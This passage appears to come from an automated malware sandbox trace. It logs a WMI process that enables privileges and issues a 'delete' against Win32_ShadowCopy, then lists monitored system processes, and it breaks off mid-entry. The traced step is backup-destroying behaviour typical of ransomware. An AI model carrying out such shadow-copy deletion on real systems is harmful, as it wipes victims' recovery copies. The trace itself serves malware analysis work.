[0133.371] malloc (_Size=0x14) returned 0x47c7f0 [0133.371] lstrlenW (lpString="XDUWTFONO") returned 9 [0133.371] GetCurrentThreadId () returned 0x2dc [0133.371] GetCurrentProcess () returned 0xffffffffffffffff [0133.371] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xcf560 | out: TokenHandle=0xcf560*=0x284) returned 1 [0133.371] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf558 | out: TokenInformation=0x0, ReturnLength=0xcf558) returned 0 [0133.371] malloc (_Size=0x118) returned 0x47cae0 [0133.371] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x3, TokenInformation=0x47cae0, TokenInformationLength=0x118, ReturnLength=0xcf558 | out: TokenInformation=0x47cae0, ReturnLength=0xcf558) returned 1 [0133.371] AdjustTokenPrivileges (in: TokenHandle=0x284, DisableAllPrivileges=0, NewState=0x47cae0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=460610567, Attributes=0x4c1e), (Luid.LowPart=0x0, Luid.HighPart=1367984, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=939524923, Attributes=0x4c09), (Luid.LowPart=0x0, Luid.HighPart=4653400, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0133.371] free (_Block=0x47cae0) [0133.371] CloseHandle (hObject=0x284) returned 1 [0133.371] lstrlenW (lpString="GET") returned 3 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0133.371] lstrlenW (lpString="LIST") returned 4 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0133.371] lstrlenW (lpString="SET") returned 3 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0133.371] lstrlenW (lpString="CALL") returned 4 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0133.371] lstrlenW (lpString="ASSOC") returned 5 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0133.371] lstrlenW (lpString="CREATE") returned 6 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0133.371] lstrlenW (lpString="DELETE") returned 6 [0133.371] lstrlenW (lpString="delete") returned 6 [0133.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0133.372] malloc (_Size=0x18) returned 0x47c8b0 [0133.372] lstrlenA (lpString="") returned 0 [0133.372] malloc (_Size=0x2) returned 0x14dfb0 [0133.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffb8314c, cbMultiByte=-1, lpWideCharStr=0x14dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0133.373] free (_Block=0x14dfb0) [0133.373] malloc (_Size=0x18) returned 0x47c930 [0133.373] lstrlenA (lpString="") returned 0 [0133.373] malloc (_Size=0x2) returned 0x14dfb0 [0133.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffb8314c, cbMultiByte=-1, lpWideCharStr=0x14dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0133.373] free (_Block=0x14dfb0) [0133.373] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0133.373] malloc (_Size=0x3e) returned 0x47cae0 [0133.373] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0133.373] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0133.373] malloc (_Size=0x18) returned 0x47c9d0 [0133.373] free (_Block=0x47c930) [0133.373] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008400680007 | out: _String=0x0, _Context=0x53008400680007) returned="*" [0133.373] lstrlenW (lpString="FROM") returned 4 [0133.373] lstrlenW (lpString="*") returned 1 [0133.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0133.373] malloc (_Size=0x18) returned 0x47c930 [0133.373] free (_Block=0x47c9d0) [0133.373] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008500680007 | out: _String=0x0, _Context=0x53008500680007) returned="from" [0133.373] lstrlenW (lpString="FROM") returned 4 [0133.373] lstrlenW (lpString="from") returned 4 [0133.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0133.373] malloc (_Size=0x18) returned 0x47c9d0 [0133.373] free (_Block=0x47c930) [0133.373] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008600680007 | out: _String=0x0, _Context=0x53008600680007) returned="Win32_ShadowCopy" [0133.373] malloc (_Size=0x18) returned 0x47c930 [0133.374] free (_Block=0x47c9d0) [0133.374] free (_Block=0x47cae0) [0133.374] malloc (_Size=0x18) returned 0x47c9d0 [0133.374] malloc (_Size=0x18) returned 0x47c8d0 [0133.374] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0133.374] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0133.374] free (_Block=0x47c8b0) [0133.374] free (_Block=0x47c9d0) [0133.374] ??0CHString@@QEAA@XZ () returned 0xcf4d0 [0133.374] GetCurrentThreadId () returned 0x2dc [0133.374] malloc (_Size=0x18) returned 0x47c9d0 [0133.374] malloc (_Size=0x18) returned 0x47c8b0 [0133.374] malloc (_Size=0x18) returned 0x47c950 [0133.374] malloc (_Size=0x18) returned 0x47c970 [0133.374] malloc (_Size=0x18) returned 0x47c990 [0133.374] SysStringLen (param_1="\\\\") returned 0x2 [0133.374] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0133.374] malloc (_Size=0x18) returned 0x47c9b0 [0133.374] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0133.374] SysStringLen (param_1="\\") returned 0x1 [0133.374] malloc (_Size=0x18) returned 0x47c9f0 [0133.374] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0133.374] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0133.375] free (_Block=0x47c9b0) [0133.375] free (_Block=0x47c990) [0133.375] free (_Block=0x47c970) [0133.375] free (_Block=0x47c950) [0133.375] free (_Block=0x47c8b0) [0133.375] free (_Block=0x47c9d0) [0133.375] malloc (_Size=0x18) returned 0x47c9d0 [0133.375] malloc (_Size=0x18) returned 0x47c8b0 [0133.375] malloc (_Size=0x18) returned 0x47c950 [0133.375] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ba1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffbf29d0 | out: ppNamespace=0xffbf29d0*=0x1bb3c18) returned 0x0 [0133.379] free (_Block=0x47c950) [0133.379] free (_Block=0x47c8b0) [0133.379] free (_Block=0x47c9d0) [0133.379] CoSetProxyBlanket (pProxy=0x1bb3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0133.380] free (_Block=0x47c9f0) [0133.380] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.380] ??0CHString@@QEAA@XZ () returned 0xcf420 [0133.380] GetCurrentThreadId () returned 0x2dc [0133.380] malloc (_Size=0x18) returned 0x47c9f0 [0133.380] lstrlenA (lpString="") returned 0 [0133.380] malloc (_Size=0x2) returned 0x14dfb0 [0133.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffb8314c, cbMultiByte=-1, lpWideCharStr=0x14dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0133.380] free (_Block=0x14dfb0) [0133.380] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0133.380] SysStringLen (param_1="") returned 0x0 [0133.380] free (_Block=0x47c9f0) [0133.380] malloc (_Size=0x18) returned 0x47c9f0 [0133.380] IWbemServices:ExecQuery (in: This=0x1bb3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0xcf428 | out: ppEnum=0xcf428*=0x1bb3d18) returned 0x0 [0133.730] free (_Block=0x47c9f0) [0133.730] CoSetProxyBlanket (pProxy=0x1bb3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0133.733] IEnumWbemClassObject:Next (in: This=0x1bb3d18, lTimeout=-1, uCount=0x1, apObjects=0xcf430, puReturned=0xcf440 | out: apObjects=0xcf430*=0x0, puReturned=0xcf440*=0x0) returned 0x1 [0133.734] IUnknown:Release (This=0x1bb3d18) returned 0x0 [0133.735] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.735] free (_Block=0x47c930) [0133.735] free (_Block=0x47c8d0) [0133.735] GetCurrentThreadId () returned 0x2dc [0133.735] ??0CHString@@QEAA@PEBG@Z () returned 0xcf608 [0133.736] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xcf608 [0133.736] malloc (_Size=0x800) returned 0x47cb60 [0133.736] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x47cb60, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0133.736] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.736] malloc (_Size=0x1c) returned 0x47cae0 [0133.736] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x47cae0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0133.736] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0133.736] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0133.736] free (_Block=0x47cae0) [0133.737] free (_Block=0x47cb60) [0133.737] ??1CHString@@QEAA@XZ () returned 0x25745f01 [0133.737] WbemLocator:IUnknown:Release (This=0x1bb3c18) returned 0x0 [0133.737] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0133.737] _kbhit () returned 0x0 [0133.739] free (_Block=0x47cac0) [0133.739] free (_Block=0x47c7d0) [0133.739] free (_Block=0x47c7b0) [0133.739] free (_Block=0x47c790) [0133.739] free (_Block=0x47c770) [0133.739] free (_Block=0x476e80) [0133.739] free (_Block=0x47c870) [0133.739] free (_Block=0x478600) [0133.739] free (_Block=0x47c8f0) [0133.739] free (_Block=0x47ca40) [0133.739] free (_Block=0x47c890) [0133.739] free (_Block=0x47c910) [0133.739] free (_Block=0x476e10) [0133.739] free (_Block=0x476cf0) [0133.740] free (_Block=0x47ca90) [0133.740] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0133.740] free (_Block=0x476eb0) [0133.740] free (_Block=0x47c810) [0133.740] free (_Block=0x47c830) [0133.740] free (_Block=0x4763c0) [0133.740] free (_Block=0x476410) [0133.740] free (_Block=0x476460) [0133.740] free (_Block=0x47c7f0) [0133.740] free (_Block=0x477fb0) [0133.740] free (_Block=0x476cd0) [0133.740] free (_Block=0x478040) [0133.740] free (_Block=0x4768b0) [0133.740] free (_Block=0x478000) [0133.740] free (_Block=0x476850) [0133.740] free (_Block=0x476870) [0133.740] free (_Block=0x476730) [0133.740] free (_Block=0x476750) [0133.740] free (_Block=0x4766d0) [0133.740] free (_Block=0x4766f0) [0133.740] free (_Block=0x476790) [0133.740] free (_Block=0x4767b0) [0133.740] free (_Block=0x4767f0) [0133.741] free (_Block=0x476810) [0133.741] free (_Block=0x476610) [0133.741] free (_Block=0x476630) [0133.741] free (_Block=0x4765b0) [0133.741] free (_Block=0x4765d0) [0133.741] free (_Block=0x476670) [0133.741] free (_Block=0x476690) [0133.741] free (_Block=0x476550) [0133.741] free (_Block=0x476570) [0133.741] free (_Block=0x4764e0) [0133.741] free (_Block=0x4764b0) [0133.741] free (_Block=0x476d80) [0133.741] WbemLocator:IUnknown:Release (This=0x1ba1390) returned 0x2 [0133.741] WbemLocator:IUnknown:Release (This=0x1bb3b28) returned 0x0 [0133.742] WbemLocator:IUnknown:Release (This=0x1bb3a98) returned 0x0 [0133.743] WbemLocator:IUnknown:Release (This=0x1ba1390) returned 0x1 [0133.743] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0133.743] WbemLocator:IUnknown:Release (This=0x1ba1390) returned 0x0 [0133.743] free (_Block=0x47c6f0) [0133.743] free (_Block=0x47c710) [0133.743] free (_Block=0x478540) [0133.743] free (_Block=0x47c730) [0133.743] free (_Block=0x47c750) [0133.743] free (_Block=0x478580) [0133.743] free (_Block=0x47c570) [0133.743] free (_Block=0x47c590) [0133.743] free (_Block=0x4783c0) [0133.743] free (_Block=0x47c5b0) [0133.743] free (_Block=0x47c5d0) [0133.743] free (_Block=0x478400) [0133.743] free (_Block=0x47c4f0) [0133.744] free (_Block=0x47c510) [0133.744] free (_Block=0x478340) [0133.744] free (_Block=0x47c530) [0133.744] free (_Block=0x47c550) [0133.744] free (_Block=0x478380) [0133.744] free (_Block=0x47c670) [0133.744] free (_Block=0x47c690) [0133.744] free (_Block=0x4784c0) [0133.744] free (_Block=0x47c6b0) [0133.744] free (_Block=0x47c6d0) [0133.744] free (_Block=0x478500) [0133.744] free (_Block=0x47c470) [0133.744] free (_Block=0x47c490) [0133.744] free (_Block=0x4782c0) [0133.744] free (_Block=0x47c4b0) [0133.744] free (_Block=0x47c4d0) [0133.744] free (_Block=0x478300) [0133.744] free (_Block=0x47c5f0) [0133.744] free (_Block=0x47c610) [0133.745] free (_Block=0x478440) [0133.745] free (_Block=0x47c630) [0133.745] free (_Block=0x47c650) [0133.745] free (_Block=0x478480) [0133.745] free (_Block=0x47c3b0) [0133.745] free (_Block=0x47c3d0) [0133.745] free (_Block=0x478200) [0133.745] free (_Block=0x47c270) [0133.745] free (_Block=0x47c290) [0133.745] free (_Block=0x4780c0) [0133.745] free (_Block=0x476d40) [0133.745] free (_Block=0x476d60) [0133.745] free (_Block=0x478080) [0133.745] free (_Block=0x47c2f0) [0133.745] free (_Block=0x47c310) [0133.745] free (_Block=0x478140) [0133.745] free (_Block=0x47c3f0) [0133.745] free (_Block=0x47c410) [0133.745] free (_Block=0x478240) [0133.745] free (_Block=0x47c2b0) [0133.746] free (_Block=0x47c2d0) [0133.746] free (_Block=0x478100) [0133.746] free (_Block=0x47c330) [0133.746] free (_Block=0x47c350) [0133.746] free (_Block=0x478180) [0133.746] free (_Block=0x47c370) [0133.746] free (_Block=0x47c390) [0133.746] free (_Block=0x4781c0) [0133.746] free (_Block=0x47c430) [0133.746] free (_Block=0x47c450) [0133.746] free (_Block=0x478280) [0133.746] CoUninitialize () [0133.786] exit (_Code=0) [0133.786] free (_Block=0x4785c0) [0133.786] free (_Block=0x477c40) [0133.786] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.786] free (_Block=0x476e30) [0133.786] free (_Block=0x476530) [0133.786] free (_Block=0x477c00) [0133.786] free (_Block=0x477bc0) [0133.786] free (_Block=0x477b70) [0133.786] free (_Block=0x477b30) [0133.786] free (_Block=0x475ac0) [0133.786] free (_Block=0x477ab0) [0133.786] free (_Block=0x475a80) [0133.786] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0133.786] free (_Block=0x47c850) Thread: id = 58 os_tid = 0xa08 Thread: id = 60 os_tid = 0x6d8 Thread: id = 61 os_tid = 0x73c Thread: id = 62 os_tid = 0xa18 Thread: id = 63 os_tid = 0x2ac Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 69 os_tid = 0xb9c Thread: id = 70 os_tid = 0xa2c Thread: id = 71 os_tid = 0xb24 Thread: id = 72 os_tid = 0xb94 Thread: id = 73 os_tid = 0x320 Thread: id = 74 os_tid = 0x42c Thread: id = 75 os_tid = 0x1e4 Thread: id = 76 os_tid = 0x6d0 Thread: id = 77 os_tid = 0x6bc Thread: id = 78 os_tid = 0x69c Thread: id = 79 os_tid = 0x698 Thread: id = 80 os_tid = 0x684 Thread: id = 81 os_tid = 0x678 Thread: id = 82 os_tid = 0x4a8 Thread: id = 83 os_tid = 0x46c Thread: id = 84 os_tid = 0x44c Thread: id = 85 os_tid = 0x424 Thread: id = 86 os_tid = 0x420 Thread: id = 87 os_tid = 0x41c Thread: id = 88 os_tid = 0x404 Thread: id = 89 os_tid = 0x14c Thread: id = 90 os_tid = 0x3fc Thread: id = 91 os_tid = 0x3f4 Thread: id = 92 os_tid = 0x3e8 Thread: id = 93 os_tid = 0x39c Thread: id = 94 os_tid = 0x390 Thread: id = 95 os_tid = 0x388 Thread: id = 96 os_tid = 0x37c Thread: id = 97 os_tid = 0x374 Thread: id = 111 os_tid = 0xa1c Thread: id = 112 os_tid = 0x6b8 Thread: id = 113 os_tid = 0x340 Thread: id = 114 os_tid = 0x7f0 Thread: id = 115 os_tid = 0x74c Thread: id = 116 os_tid = 0x6a4 Thread: id = 119 os_tid = 0x34c Thread: id = 144 os_tid = 0x7b4 Thread: id = 145 os_tid = 0x23c Thread: id = 146 os_tid = 0x9a8 Thread: id = 147 os_tid = 0xb34 Process: id = "12" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6176b000" os_pid = "0xa70" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00042bb4" [0xc000000f] Thread: id = 98 os_tid = 0xafc Thread: id = 99 os_tid = 0xa8c Thread: id = 100 os_tid = 0xa88 Thread: id = 101 os_tid = 0xa84 Thread: id = 102 os_tid = 0xa78 Thread: id = 103 os_tid = 0xa74 Thread: id = 117 os_tid = 0x130 Process: id = "13" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x63166000" os_pid = "0xa3c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 104 os_tid = 0xa28 Thread: id = 105 os_tid = 0xa5c Thread: id = 106 os_tid = 0xa58 Thread: id = 107 os_tid = 0xa54 Thread: id = 108 os_tid = 0xa50 Thread: id = 109 os_tid = 0xa44 Thread: id = 110 os_tid = 0xa40 Thread: id = 122 os_tid = 0x324 Process: id = "14" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 131 os_tid = 0x640 Thread: id = 132 os_tid = 0x434 Thread: id = 133 os_tid = 0x768 Thread: id = 134 os_tid = 0x764 Thread: id = 135 os_tid = 0x758 Thread: id = 136 os_tid = 0x724 Thread: id = 137 os_tid = 0x718 Thread: id = 138 os_tid = 0x714 Thread: id = 139 os_tid = 0x630 Thread: id = 140 os_tid = 0x154 Thread: id = 141 os_tid = 0x150 Thread: id = 142 os_tid = 0x118 Thread: id = 143 os_tid = 0xf0 Process: id = "15" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 153 os_tid = 0x8 Thread: id = 154 os_tid = 0x38 Thread: id = 155 os_tid = 0x34 Thread: id = 156 os_tid = 0x24 Thread: id = 157 os_tid = 0x3c Thread: id = 158 os_tid = 0x9c Thread: id = 159 os_tid = 0x78 Thread: id = 160 os_tid = 0xc0 Thread: id = 161 os_tid = 0xc8 Thread: id = 162 os_tid = 0x28 Thread: id = 163 os_tid = 0x44 Thread: id = 164 os_tid = 0x40 Thread: id = 165 os_tid = 0x5c Thread: id = 166 os_tid = 0xc4 Thread: id = 167 os_tid = 0xcc Thread: id = 168 os_tid = 0xd0 Thread: id = 169 os_tid = 0xb8 Thread: id = 170 os_tid = 0xd4 Thread: id = 171 os_tid = 0xd8 Thread: id = 172 os_tid = 0xdc Thread: id = 175 os_tid = 0x68 Thread: id = 176 os_tid = 0x0 Thread: id = 177 os_tid = 0x30 Thread: id = 179 os_tid = 0x80 Thread: id = 180 os_tid = 0x48 Thread: id = 181 os_tid = 0x2c Thread: id = 182 os_tid = 0xf8 Thread: id = 183 os_tid = 0xfc Thread: id = 184 os_tid = 0x100 Thread: id = 185 os_tid = 0x108 Thread: id = 186 os_tid = 0x10c Thread: id = 187 os_tid = 0x110 Thread: id = 188 os_tid = 0x104 Thread: id = 189 os_tid = 0xb4 Thread: id = 190 os_tid = 0x114 Thread: id = 191 os_tid = 0x98 Thread: id = 192 os_tid = 0x8c Thread: id = 193 os_tid = 0x118 Thread: id = 194 os_tid = 0xb0 Thread: id = 197 os_tid = 0x4c Thread: id = 199 os_tid = 0x134 Thread: id = 200 os_tid = 0x138 Thread: id = 201 os_tid = 0x13c Thread: id = 202 os_tid = 0x140 Thread: id = 203 os_tid = 0x90 Thread: id = 220 os_tid = 0x194 Thread: id = 238 os_tid = 0x60 Thread: id = 242 os_tid = 0x88 Thread: id = 270 os_tid = 0x74 Thread: id = 275 os_tid = 0x274 Thread: id = 284 os_tid = 0x84 Thread: id = 289 os_tid = 0x50 Thread: id = 294 os_tid = 0xbc Thread: id = 305 os_tid = 0x2e8 Thread: id = 314 os_tid = 0x310 Thread: id = 357 os_tid = 0x3c8 Thread: id = 390 os_tid = 0x1a4 Thread: id = 397 os_tid = 0x348 Thread: id = 401 os_tid = 0x3f8 Thread: id = 439 os_tid = 0x94 Thread: id = 458 os_tid = 0xa0 Process: id = "16" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2a9cb000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x4" cmd_line = 